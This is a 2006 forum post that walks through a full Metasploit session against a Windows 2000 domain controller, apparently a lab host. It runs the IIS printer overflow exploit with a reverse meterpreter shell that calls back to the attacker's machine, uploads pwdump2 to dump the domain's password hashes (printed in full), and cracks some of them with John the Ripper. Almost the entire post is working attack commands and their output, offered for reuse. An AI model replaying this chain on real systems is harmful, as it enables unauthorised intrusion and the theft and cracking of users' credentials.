|
Title: Using MSF meterpreter to upload and use pwdump2 on a win2k DC Post by: ChrisG on July 30, 2006, 10:06:36 PM Here you go been fooling around with the metasploit meterpreter and used it to exploit a host, upload pwdump2, execute the program sucessfully to dump the SAM hases for the domain and then fire up john to crack the hashes. enjoy...
SegFault:~/framework-2.5 chrisgates$ ./msfconsole __. .__. .__. __. _____ _____/ |______ ____________ | | ____ |__|/ |_ / \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\ | Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || | |__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__| \/ \/ \/ \/ |__| + -- --=[ msfconsole v2.5 [114 exploits - 74 payloads] msf > use iis50_printer_overflow msf iis50_printer_overflow > set PAYLOAD win32_reverse_meterpreter PAYLOAD -> win32_reverse_meterpreter msf iis50_printer_overflow(win32_reverse_meterpreter) > set RHOST 192.168.0.107 RHOST -> 192.168.0.107 msf iis50_printer_overflow(win32_reverse_meterpreter) > set LHOST 192.168.0.101 LHOST -> 192.168.0.101 msf iis50_printer_overflow(win32_reverse_meterpreter) > exploit
[ -= connected to =- ] [ -= meterpreter server =- ] [ -= v. 00000500 =- ] meterpreter> help Core Core feature set commands ------------ ---------------- read Reads from a communication channel write Writes to a communication channel close Closes a communication channel interact Switch to interactive mode with a channel help Displays the list of all register commands exit Exits the client initcrypt Initializes the cryptographic subsystem Extensions Feature extension commands ------------ ---------------- loadlib Loads a library on the remote endpoint use Uses a feature extension module meterpreter> use Usage: use -m module1,module2,module3 [ -p path ] [ -d ] -m <mod> The names of one or more modules to load (e.g. 'net'). -p <path> The path to load the modules from locally. -d Load the library from disk, do not upload it. meterpreter> use -m Fs loadlib: Loading library from 'ext680723.dll' on the remote machine. meterpreter> loadlib: success. meterpreter> help Core Core feature set commands ------------ ---------------- read Reads from a communication channel write Writes to a communication channel close Closes a communication channel interact Switch to interactive mode with a channel help Displays the list of all register commands exit Exits the client initcrypt Initializes the cryptographic subsystem Extensions Feature extension commands ------------ ---------------- loadlib Loads a library on the remote endpoint use Uses a feature extension module File System File system interaction and manipulation commands ------------ ---------------- cd Change working directory. getcwd Get the current working directory. ls List the contents of a directory. upload Upload one or more files to a remote directory. download Download one or more files from a remote directory. meterpreter> upload /Users/chrisgates/framework-2.5/evil/PWDUMP2.EXE C:\ upload: Starting upload of '/Users/chrisgates/framework-2.5/evil/PWDUMP2.EXE' to 'C:\\PWDUMP2.EXE'... upload: 1 uploads started. meterpreter> upload: Upload from '/Users/chrisgates/framework-2.5/evil/PWDUMP2.EXE' succeeded. meterpreter> upload /Users/chrisgates/framework-2.5/evil/SAMDUMP.DLL C:\ upload: Starting upload of '/Users/chrisgates/framework-2.5/evil/SAMDUMP.DLL' to 'C:\\SAMDUMP.DLL'... upload: 1 uploads started. meterpreter> upload: Upload from '/Users/chrisgates/framework-2.5/evil/SAMDUMP.DLL' succeeded. meterpreter> execute -f cmd -c execute: Executing 'cmd'... meterpreter> execute: success, process id is 2116. execute: allocated channel 4 for new process. meterpreter> interact 4 interact: Switching to interactive console on 4... meterpreter> interact: Started interactive channel 4. Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\>PWDUMP2 PWDUMP2 Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f4d5c901afc6b10357012c647e1e3d7b::: TsInternetUser:1000:747eb3a47d5c5997741c63e3b03d7af3:3600cc61d6a7732b46a82a8ba1ca98b2::: NetShowServices:1001:00a1e1cd5cbee084f3e28a66a4b7c4b7:dc101f98eb6d8794771fcf7ce9906862::: IUSR_LSO-HACKWINDOWS:1003:38925a13e93dfe7d3127babea64acab3:88c178bfaf976b026b3d36c01c11ca65::: IWAM_LSO-HACKWINDOWS:1004:bed00505c344453b26d7329bcf953374:707983c77cff4606beb470e26122cf62::: LSO:1111:743a025f7d3cfc4faad3b435b51404ee:bdf40214203c93099d9295c7d4595205::: IME_USER:1112:4da9826b50892c5d00aa4eedb6ef32d3:b863209024a2f29f7f614cbb9ec4c8cd::: IME_ADMIN:1113:4da9826b50892c5d00aa4eedb6ef32d3:b863209024a2f29f7f614cbb9ec4c8cd::: testuser1:1115:0f20048efc645d0a179b4d5d6690bdf3:1120acb74670c7dd46f1d3f5038a5ce8::: remote:1119:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: LSO-HACKWINDOWS$:1008:aad3b435b51404eeaad3b435b51404ee:872aa7a4b892bdb77dafec09c87fc7bb::: TEST1$:1114:aad3b435b51404eeaad3b435b51404ee:aacd12d27c87cac8fc0b8538aed6f058::: C:\>del PWDUMP2.EXE del PWDUMP2.EXE C:\PWDUMP2.EXE Access is denied. C:\>DEL SAMDUMP.DLL DEL SAMDUMP.DLL C:\>dir dir Volume in drive C has no label. Volume Serial Number is A042-AC7F Directory of C:\ 12/22/2005 02:11p <DIR> ASFRoot 12/24/2005 08:07a 956 certreq.txt 12/22/2005 10:28p <DIR> Documents and Settings 12/22/2005 10:13p <DIR> Inetpub 01/02/2006 06:36a <DIR> Microsoft UAM Volume 01/02/2006 02:52a <DIR> Program Files 01/02/2006 12:45p 32,768 PWDUMP2.EXE 01/02/2006 07:11a <DIR> Share1 01/02/2006 07:11a <DIR> Share2 01/02/2006 05:09a <DIR> Share3 01/02/2006 02:50a <DIR> Snort 01/01/2006 05:30a <DIR> unzipped 01/01/2006 06:21a <DIR> WINNT 2 File(s) 33,724 bytes 11 Dir(s) 3,062,620,160 bytes free C:\>exit exit interact: Ending interactive session. meterpreter> getuid meterpreter> Username: IUSR_LSO-HACKWINDOWS meterpreter> exit exit The meterpreter is shutting down...
SegFault:~ chrisgates$ cp /Users/chrisgates/framework-2.5/evil/LSO-DC-hash.rtf /Users/chrisgates/john-1.6.39/run/ SegFault:~ chrisgates$ cd john-1.6.39/run/ SegFault:~/john-1.6.39/run chrisgates$ john -i LSO-DC-hash.rtf Loaded 17 passwords with no different salts (NT LM DES [24/32 4K]) TESTUSE (testuser1:1) LSO (LSO:1) R1 (testuser1:2) PASSWOR (remote:1) D (remote:2) ***I cut john off early, it wasnt a cracking exercise***
Powered by SMF 1.1.7 |
SMF © 2006-2008, Simple Machines LLC
Joomla Bridge by JoomlaHacks.com |